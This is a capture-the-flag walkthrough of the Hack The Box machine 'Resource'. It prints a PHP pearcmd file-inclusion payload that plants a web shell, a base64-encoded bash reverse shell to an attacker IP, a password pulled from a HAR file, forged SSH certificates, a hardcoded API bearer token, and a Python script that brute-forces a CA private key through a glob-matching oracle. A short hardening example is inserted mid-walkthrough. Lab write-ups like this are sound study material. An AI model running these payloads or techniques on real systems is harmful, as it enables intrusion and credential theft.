HacktheBox-Resource

Season 6 Week 1

Couldn't sleep, so I fired off a box. This is rated medium? Seriously?
Clip_2024-08-09_17-25-36.png

Information gathering

One pass with fscan:

start infoscan
10.10.11.27:80 open
10.10.11.27:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.10.11.27 code:302 len:154 title:302 Found 跳转url: http://itrc.ssg.htb/

The scan turns up a third-level domain; add it to the hosts file.

pearcmd

The fingerprint shows PHP with a file upload. I hammered on it for ages without getting anywhere; a writeup later pointed to pearcmd, since it's tp.

/?page=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=eval($_REQUEST[1]);?>+/var/www/itrc/uploads/shell.php

Clip_2024-08-09_14-36-14.png
Then visit the upload path uploads/shell.php to test it.
Clip_2024-08-09_14-38-22.png
Reverse shell.
Clip_2024-08-09_14-45-34.png
🤔
For some reason this variant would not give me a reverse shell. But since pearcmd works, I switched to dropping a shell that sets up the reverse shell directly when it is written.

page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode("L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTAuMTAuMTQuMzMvNzc3NyAwPiYxJw=="));?>+/var/www/itrc/uploads/shell.php

Clip_2024-08-09_14-49-17.png
Then unpack the largest zip file in the uploads folder:
Clip_2024-08-09_14-57-39.png
Download it locally: http://itrc.ssg.htb/uploads/c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
Inspect the file:

cat itrc.ssg.htb.har| grep pass

Clip_2024-08-09_15-01-53.png
user=msainristil&pass=82yards2closeit

SSH itrc - msainristil

SSH login works.

ssh msainristil@10.10.11.27

Then I got stuck again and read the writeup.
Notice the .dockerenv in the root directory,
Clip_2024-08-09_15-04-47.png
which means we are inside a Docker container and need to escape.
Listing all users shows there is also a zzinter.
Clip_2024-08-09_15-11-12.png
Go into the ~/decommission_old_ca folder.

ssh-keygen -t rsa -b 2048 -f natro92

Generate a key pair, specifying the algorithm and key length.
Clip_2024-08-09_15-17-33.png

ssh-keygen -s ca-itrc -I uuu -V +1w -n zzinter -z 1 natro92.pub 

-s ca-itrc: sign with the CA key named ca-itrc.
-I uuu: set the certificate's key identity to uuu.
-V +1w: make the certificate valid for one week.
-n zzinter: set the certificate principal to zzinter.
-z 1: set the certificate serial number to 1.
Clip_2024-08-09_15-25-58.png

ssh -o CertificateFile=natro92-cert.pub -i natro92 zzinter@localhost

-o CertificateFile=natro92-cert.pub: use the certificate file natro92-cert.pub for authentication.
-i natro92: use the private key file natro92 for authentication.

itrc - zzinter

Clip_2024-08-09_15-28-54.png
Clip_2024-08-09_15-31-16.png
This is user-level access and holds the user flag. But we are still inside Docker.

cat /etc/ssh/ca_users_keys.pub

The user's home directory contains a sign_key_api.sh:

#!/bin/bash

usage () {
    echo "Usage: $0 <public_key_file> <username> <principal>"
    exit 1
}

if [ "$#" -ne 3 ]; then
    usage
fi

public_key_file="$1"
username="$2"
principal_str="$3"

supported_principals="webserver,analytics,support,security"
IFS=',' read -ra principal <<< "$principal_str"
for word in "${principal[@]}"; do
    if ! echo "$supported_principals" | grep -qw "$word"; then
        echo "Error: '$word' is not a supported principal."
        echo "Choose from:"
        echo " webserver - external web servers - webadmin user"
        echo " analytics - analytics team databases - analytics user"
        echo " support - IT support server - support user"
        echo " security - SOC servers - support user"
        echo
        usage
    fi
done

if [ ! -f "$public_key_file" ]; then
    echo "Error: Public key file '$public_key_file' not found."
    usage
fi

public_key=$(cat $public_key_file)

curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "'"$public_key"'", "username": "'"$username"'", "principals": "'"$principal"'"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE"

The important part is lines 16 to 29 of the script (the supported_principals check). It defines a string of supported principals, splits the input principal_str on commas into the array principal, then loops over that array; any element not in the supported list prints an error, lists the supported options, and calls usage.
It then checks that the public key file exists, and finally sends a POST request with curl.
Supply the parameters it asks for.

ssh-keygen -t rsa -b 2048 -f natro93
bash ./sign_key_api.sh natro93.pub natro92 support
ssh-rsa-cert-v01@openssh.com AAAAHHNzaC1yc2EtY2VydC12MDFAb3BlbnNzaC5jb20AAAAgk1qje5oXOK3N1niFmX5LcP2K5AQjM1UJGRjgGlcOGqAAAAADAQABAAABAQC7LLvZISmjlIpCx8hQSwxbW5jaWzwLB1Qnu7EmLPl9vu7F0gwfGZLT1/YuTN129f1+xfSqRMWSzsK3khEzXiSC4wbD4X5e7pJbDBBqtZMjSP68u4uoe51fb9GB0U72N6eXUOXcUoNImEVY4g5lM4600ky47CcC9z9ZTLtXi5WA0fNUlcAEwFEM1dMiBErHsTfVQk1fLxVkuB+DF8+hJCbV0T6STeHQlB19hDWIeyPK56a0l5rW5yOaFroU4SQDaTmbKqdBT/wskzyIypiPTTJKxu3i3lD7xmL7i358gYhHYMluDVVpKlscAVCkOuogS6B/MGSme1E/WV6QsSlO8QlnAAAAAAAAACgAAAABAAAAB25hdHJvOTIAAAALAAAAB3N1cHBvcnQAAAAAZqyTxP//////////AAAAAAAAAIIAAAAVcGVybWl0LVgxMS1mb3J3YXJkaW5nAAAAAAAAABdwZXJtaXQtYWdlbnQtZm9yd2FyZGluZwAAAAAAAAAWcGVybWl0LXBvcnQtZm9yd2FyZGluZwAAAAAAAAAKcGVybWl0LXB0eQAAAAAAAAAOcGVybWl0LXVzZXItcmMAAAAAAAAAAAAAADMAAAALc3NoLWVkMjU1MTkAAAAggeDwK53LVKHJh+rMLcA2WABxbtDgyhm57MATyY0VKbEAAABTAAAAC3NzaC1lZDI1NTE5AAAAQA9H4WvMX2Fw0Gnxo46MwUKmPYrHMOiOCzjOAbccPvPdpfyRuvQl1mYP3P7vx/v6KS22yfKBlMVcWYy7NwAYlwQ= zzinter@itrc

Then write it into a file and set its permissions to 600.

vim natro
chmod 600 natro
chmod 600 natro93

Then connect:

ssh -i natro93 -p 2222 -o CertificateFile=natro support@172.223.0.1

ssg - support

Clip_2024-08-09_15-45-17.png
The home folder contains support and zzinter.

ls /etc/ssh/auth_principals
root support zzinter
support@ssg:/etc/ssh/auth_principals$ cat root
root_user
support@ssg:/etc/ssh/auth_principals$ cat support
support
root_user
support@ssg:/etc/ssh/auth_principals$ cat zzinter
zzinter_temp

sign_key.sh under /opt is owned by group zzinter.
Clip_2024-08-09_15-48-16.png
Then open another SSH session back as zzinter and paste the contents of natro93.pub into a curl request of our own. The principal allowlist lives only in the client-side script, and the bearer token is hardcoded in it, so calling the API directly lets us ask for the zzinter_temp principal that the script would refuse.

curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2vbyOgAno0/wUAP6PSrfnSaQbQA4l9iwCzyczChIVnqE3tq27U9/RomzVkjZhMKmoQDgfdPkh42eiF5OLgdAHllGWYMsY+vprcoOp9h6GFJG+5raQELEWglv53JHPafeTeq0k99D2jX5P3DzNT4jVAYjdezPduGTtaelzEjzXgcoxxeguT76f+Egiaqlgc7ezBjFlLe6adhVKdOLujjsYd4LopHy20K/MSPqRN12zWqvtg+wmgSD2liDTEoGDpnqIzYTmSheQjqScHKV83MuIbR01XGKlIIKfz5B8W5ktO5fS70KlOEV9idNOdLJTGDoSLFWhm08/BAR6GsjCFaR7 zzinter@itrc", "username": "zzinter", "principals": "zzinter_temp"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE"

Save the returned result into natro93-cert:

ssh-rsa-cert-v01@openssh.com AAAAHHNzaC1yc2EtY2VydC12MDFAb3BlbnNzaC5jb20AAAAghz3leEbghiKRMEKYVN6L3RKuiTJV1cfLF4XK1Fd3RSYAAAADAQABAAABAQC2vbyOgAno0/wUAP6PSrfnSaQbQA4l9iwCzyczChIVnqE3tq27U9/RomzVkjZhMKmoQDgfdPkh42eiF5OLgdAHllGWYMsY+vprcoOp9h6GFJG+5raQELEWglv53JHPafeTeq0k99D2jX5P3DzNT4jVAYjdezPduGTtaelzEjzXgcoxxeguT76f+Egiaqlgc7ezBjFlLe6adhVKdOLujjsYd4LopHy20K/MSPqRN12zWqvtg+wmgSD2liDTEoGDpnqIzYTmSheQjqScHKV83MuIbR01XGKlIIKfz5B8W5ktO5fS70KlOEV9idNOdLJTGDoSLFWhm08/BAR6GsjCFaR7AAAAAAAAACoAAAABAAAAB3p6aW50ZXIAAAAQAAAADHp6aW50ZXJfdGVtcAAAAABmrI9x//////////8AAAAAAAAAggAAABVwZXJtaXQtWDExLWZvcndhcmRpbmcAAAAAAAAAF3Blcm1pdC1hZ2VudC1mb3J3YXJkaW5nAAAAAAAAABZwZXJtaXQtcG9ydC1mb3J3YXJkaW5nAAAAAAAAAApwZXJtaXQtcHR5AAAAAAAAAA5wZXJtaXQtdXNlci1yYwAAAAAAAAAAAAAAMwAAAAtzc2gtZWQyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQAAAFMAAAALc3NoLWVkMjU1MTkAAABALXtAVOEZ4ai9TuxOFPHEzEtGC8MidfqmrP/hirq7Ajg2jZ4HtNVTIBfQut8Gie7Z3eku6PofgEEfrXcFWd9/CQ== zzinter@itrc

Then connect:

ssh -p 2222 -i natro93 -o CertificateFile=natro93-cert zzinter@172.223.0.1

ssg - zzinter

Now we are logged into ssg. Use zzinter's account to read sign_key.sh, which we had no permission for earlier:

#!/bin/bash

usage () {
    echo "Usage: $0 <ca_file> <public_key_file> <username> <principal> <serial>"
    exit 1
}

if [ "$#" -ne 5 ]; then
    usage
fi

ca_file="$1"
public_key_file="$2"
username="$3"
principal="$4"
serial="$5"

if [ ! -f "$ca_file" ]; then
    echo "Error: CA file '$ca_file' not found."
    usage
fi

if [[ $ca == "/etc/ssh/ca-it" ]]; then
    echo "Error: Use API for signing with this CA."
    usage
fi

itca=$(cat /etc/ssh/ca-it)
ca=$(cat "$ca_file")
if [[ $itca == $ca ]]; then
    echo "Error: Use API for signing with this CA."
    usage
fi

if [ ! -f "$public_key_file" ]; then
    echo "Error: Public key file '$public_key_file' not found."
    usage
fi

supported_principals="webserver,analytics,support,security"
IFS=',' read -ra principal <<< "$principal_str"
for word in "${principal[@]}"; do
    if ! echo "$supported_principals" | grep -qw "$word"; then
        echo "Error: '$word' is not a supported principal."
        echo "Choose from:"
        echo " webserver - external web servers - webadmin user"
        echo " analytics - analytics team databases - analytics user"
        echo " support - IT support server - support user"
        echo " security - SOC servers - support user"
        echo
        usage
    fi
done

if ! [[ $serial =~ ^[0-9]+$ ]]; then
    echo "Error: '$serial' is not a number."
    usage
fi

ssh-keygen -s "$ca_file" -z "$serial" -I "$username" -V -1w:forever -n "$principals" "$public_key_name"
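The comparison in sign_key.sh that protects /etc/ssh/ca-it, isolated as an added example (not code from the box or the writeup) next to the hardened form a maintainer should have written. SECRET_CA is a constructed placeholder, not the real CA key.

```shell
#!/bin/bash
# Added example, not code from the box or the writeup. It isolates the
# check in sign_key.sh that guards /etc/ssh/ca-it and shows why an
# unquoted right-hand side lets a caller-supplied file act as a pattern.

# Constructed stand-in for the protected CA contents (not the real key).
SECRET_CA='-----BEGIN OPENSSH PRIVATE KEY-----
AAAA-constructed-placeholder-AAAA
-----END OPENSSH PRIVATE KEY-----'

# The comparison as written on the box. With $ca unquoted, [[ == ]] does
# glob matching, so '*' or '*<correct tail>' compares equal to the secret.
# Returns 0 when the supplied content matches.
vulnerable_check() {
    local itca="$SECRET_CA" ca="$1"
    [[ $itca == $ca ]]
}

# The hardened comparison: quoting "$ca" makes it a literal string, so
# only the exact CA contents compare equal and wildcards are inert.
hardened_check() {
    local itca="$SECRET_CA" ca="$1"
    [[ $itca == "$ca" ]]
}

# Demonstration on a wildcard-only "CA file" and on the genuine contents.
if vulnerable_check '*'; then
    echo "vulnerable check: a file containing only '*' passes as the CA"
fi
if ! hardened_check '*'; then
    echo "hardened check: '*' is rejected"
fi
if hardened_check "$SECRET_CA"; then
    echo "hardened check: the genuine CA still matches"
fi
```

Beyond the quoting fix, the script should not leak a distinguishable error for the protected CA at all; a constant refusal removes the oracle even if the comparison is later rewritten.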

The check [[ $itca == $ca ]] leaves $ca unquoted, so bash treats the contents of the file we pass as a glob pattern rather than a literal string: a file containing * followed by a correctly guessed tail of the real CA still compares equal and prints "Use API for signing with this CA", which turns that error message into a character-by-character oracle. PoC:

import string
import subprocess

# Character set tried for each position of the CA file: letters, base64
# symbols, newline, space and digits.
s = string.ascii_letters + '+' + '-' + '\n' + ' ' + '/' + '=' + string.digits
# Recovered tail of the CA file; the PEM footer ends in '-', so start there.
strlist = '-'

while True:
    for i in s:
        listres = i + strlist
        # sign_key.sh compares the file with an unquoted [[ == ]], so '*' plus
        # the correct tail matches the real CA and triggers the "Use API" error.
        listtemp = '*' + listres
        with open('testca', 'w') as f:
            f.write(listtemp)
        a = subprocess.run('sudo /opt/sign_key.sh ./testca test.pub root root_user 1',
                           shell=True, stdout=subprocess.PIPE, text=True)
        if 'Use API for signing with this CA' in a.stdout:
            strlist = listres
            print(strlist)
            break
    else:
        # No character extended the match: the whole file has been recovered.
        break

Then wait while it brute-forces the key bit by bit (keep an eye on the page so the box doesn't get reset 😡; I had to run it twice):
Clip_2024-08-09_16-21-39.png
Clip_2024-08-09_16-35-09.png

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQAAAKg7BlysOwZc
rAAAAAtzc2gtZWQyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQ
AAAEBexnpzDJyYdz+91UG3dVfjT/scyWdzgaXlgx75RjYOo4Hg8Cudy1ShyYfqzC3ANlgA
cW7Q4MoZuezAE8mNFSmxAAAAIkdsb2JhbCBTU0cgU1NIIENlcnRmaWNpYXRlIGZyb20gSV
QBAgM=
-----END OPENSSH PRIVATE KEY-----

Write it into the file testca and set its permissions to 600 (this matters; otherwise the cert cannot be generated).

ssh-keygen -t rsa -b 2048 -f natro1
# serial (-z) must be numeric; the original had "l" in place of "1"
ssh-keygen -s testca -I root -V -10w:forever -n root_user -z 1 natro1.pub
# use the key generated above; ssh picks up natro1-cert.pub automatically
ssh root@172.223.0.1 -p 2222 -i natro1

Clip_2024-08-09_17-11-29.png

Afterword

Damn, I couldn't do this on my own, and it's rated medium? Now I really can't sleep 😡